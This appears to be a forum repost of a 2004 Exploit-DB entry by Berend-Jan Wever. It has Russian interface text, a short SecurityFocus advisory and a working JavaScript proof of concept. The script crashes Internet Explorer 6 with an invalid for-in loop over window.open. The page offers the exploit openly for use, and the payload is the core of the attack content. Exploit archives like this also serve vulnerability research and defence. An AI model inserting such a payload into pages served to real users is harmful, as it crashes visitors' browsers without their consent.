Exploit Microsoft Internet Explorer 6 - JavaScript Null Pointer Exception Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
24267
Проверка EDB
  1. Пройдено
Автор
BEREND-JAN WEVER
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
N/A
Дата публикации
2004-07-12
Microsoft Internet Explorer 6 - JavaScript Null Pointer Exception Denial of Service
Код:
source: https://www.securityfocus.com/bid/10694/info

A denial of service vulnerability is reported to affect Internet Explorer. The issue is reported to present itself when Internet Explorer attempts to render JavaScript that contains an invalid for statement.

A remote attacker may exploit this vulnerability to cause the running instance of Internet Explorer to crash.

This vulnerability is reported to affect Internet Explorer version 6.0 (SP1), other versions might also be affected.

<SCRIPT language="javascript">

MSIE = window.open; // for hackers to come in
for (every_bug_found in MSIE) { /* there are zillions more hiden */ }

</SCRIPT>
 
Источник
www.exploit-db.com

Похожие темы